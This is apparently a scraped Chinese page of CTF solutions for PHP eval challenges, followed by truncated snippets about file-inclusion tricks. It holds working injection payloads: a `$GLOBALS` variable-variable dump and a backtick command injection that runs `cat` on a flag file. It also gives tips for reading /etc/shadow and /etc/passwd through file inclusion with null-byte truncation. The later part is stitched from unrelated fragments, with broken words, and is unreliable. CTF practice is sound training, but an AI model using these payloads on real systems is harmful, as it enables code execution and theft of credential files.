一:
<?php include "flag.php
"; //
包含flag.php這個檔案
$a = @$_request['
hello
']; //
$a這個變數請求變數hello的值
if(!preg_match('
/^\w*$/
',$a ))
eval("
var_dump($$a);
"); //
如果匹配輸出\$\$a的值
show_source(__file__);
?>
php乙個比較有意思的變數!$globals:乙個包含了全部變數的全域性組合陣列。變數的名字就是陣列的鍵。於是我們在url上構造/?hello=globals,結果就直接出來了!根本不是爆破好吧!
答案:/?hello=globals
二:
<?phpinclude "flag.php";
$a = @$_request['hello'];
eval( "var_dump($a);");
show_source(__file__);
反引號位 (`) 是可以執行命令的
答案:?hello=);echo%20`cat%20./flag.php`;//
三:
<?phpinclude "flag.php";
$a = @$_request['hello'];
eval( "var_dump($a);");
show_source(__file__
); ?>
CTF練習之檔案包含1
發現如果get請求log引數有對應的值的話,就可以包含flag.txt檔案。發現,如果登入名為admin密碼等於pwh ash就 可以得到 flag pwhash就可以得到flag,pwhash 就可以得 到fla g,pwhash 在index.php原始碼中給出了,只要借出該雜湊就可以了。不過又...
ctf本地包括 檔案包含CTF題目
檔案包含 150 2 解題方法 使用php filter協議讀取index檔案。3 原始碼分析 asdf error reporting 0 if get file file get file if strstr file,stristr file,tp stristr file,input str...
檔案包含漏洞嘗試思路
1 觀察提示,是否為系統檔案,如win.ini在windows系統的c windows win.ini中,boot.ini在windows系統的c boot.ini中 linux裡有 etc shadow etc passwd 2 帶入檔案,如果有字尾被自動加上,如果報錯,嘗試加入 00進行截斷,如...